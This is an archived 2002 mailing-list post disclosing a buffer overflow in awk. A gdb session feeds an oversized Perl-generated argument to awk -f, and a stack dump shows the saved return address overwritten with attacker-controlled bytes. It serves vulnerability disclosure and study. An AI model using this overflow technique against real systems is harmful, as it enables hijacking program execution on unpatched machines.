RE: Buffer overflow in awk

From: dong-h0un U (xploitat_private)
Date: Fri Mar 15 2002 - 13:20:18 PST

  • Next message: "Re: Buffer overflow in awk"

     This puts last 'NULL byte' and change rule of program.
     Pico editer or snmpd did exploit by similar method.
     [x82@xpl017elz x82]$ gdb -q awk
     (no debugging symbols found)...(gdb) r -f `perl -e 'print "\x82" x 8173'; printf 
     Starting program: /bin/awk -f `perl -e 'print "\x82" x 8173'; printf "\xb0\xba\x
     Program received signal SIGSEGV, Segmentation fault.
     0x8282bab0 in ?? ()
     (gdb) q
     The program is running.  Exit anyway? (y or n) y   
     [x82@xpl017elz x82]$ rpm -qa | grep awk
     [x82@xpl017elz x82]$
     0xbfffd2b0:     0x82828282      0x82828282      0x82828282      0x82828282
     0xbfffd2c0:     0x82828282      0x82828282      0x82828282      0x82828282
     0xbfffd2d0:     0x82828282      0x82828282      0x82828282      0x82828282
     0xbfffd2e0:     0x82828282      0x82828282      0x82828282      0x82828282
     0xbfffd2f0:     0x82828282      0x82828282      0x82828282      0x82828282
     0xbfffd300:     0x82828282      0x8282bab0      0xbfffd300      0x080538cc
                                                             ~~ <- it's
     0xbfffd310:     0xbfffdd46      0xbfffd390      0x080577e6      0xbfffdd46
     0xbfffd320:     0xfffffffa      0x00000000      0x00000000      0x00000000
     (gdb) x 0xbfffd304
     0xbfffd304:     0x8282bab0
     Sorry, I do not English. :-X
     by "you dong-hun"(Xpl017Elz), <szoahcat_private>. 
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